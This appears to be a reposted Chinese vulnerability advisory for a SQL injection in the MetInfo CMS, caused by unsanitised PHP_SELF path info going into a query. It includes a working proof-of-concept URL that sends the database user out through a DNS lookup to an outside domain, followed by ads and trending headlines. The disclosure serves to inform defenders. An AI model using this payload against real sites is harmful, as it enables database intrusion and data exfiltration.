MetInfo 注入
- 发布时间:2016-11-25
- 公开时间:N/A
- 漏洞类型:sql注入
- 危害等级:高
- 漏洞编号:xianzhi-2016-11-61726270
- 测试版本:N/A
漏洞详情
app/system/include/compatible/metv5_top.php 行27$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELFs = explode('/', $PHP_SELF);
$query = "SELECT * FROM {$_M['table'][column]} where module!=0 and foldername = '{$PHP_SELFs[count($PHP_SELFs)-2]}' and lang='{$_M['lang']}'";
$column = DB::get_one($query);
$_SERVER['PHP_SELF']跟$_SERVER['SCRIPT_NAME']不同 前者包括pathinfo
比如
/index.php/something/else
$_SERVER['SCRIPT_NAME']就是index.php
而$_SERVER['PHP_SELF']是/index.php/something/else
这里explode之后进入了sql语句 造成注入 找一个包含的地方就可以了
测试方法:
由于metinfo默认没显错 这里注入点也没输出 所以用延时或者类似cloudeye.me的方法来做 需要适当编码http://192.168.1.170/metinfo/member/login.php/x'%20and%20if((SELECT%20LOAD_FILE(CONCAT(0x5c5c5c5c,(SELECT%20hex(user())),0x2e6c756461732e70772f2f666f6f626172))),1,1)%23%23/awireshark抓个包证明下吧 0x726f6f74406c6f63616c686f7374=root@localhost
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 习近平引领家庭家教家风建设 4950965
- 2 习近平同俄罗斯总统普京会谈 4973209
- 3 普京抵达北京 三军仪仗队列队欢迎 4879614
- 4 没有信息化就没有现代化 4711082
- 5 汪文斌向全世界推荐峨眉女侠 4620433
- 6 康师傅方便面即将全线涨价 4511417
- 7 中方对菲律宾耐心不是无止境 4408680
- 8 戛纳红毯网红COS玉皇大帝 4312006
- 9 管理方辟谣郑州大玉米楼被刮歪 4236453
- 10 女子遭色诱沦陷拉丈夫同做间谍 4126999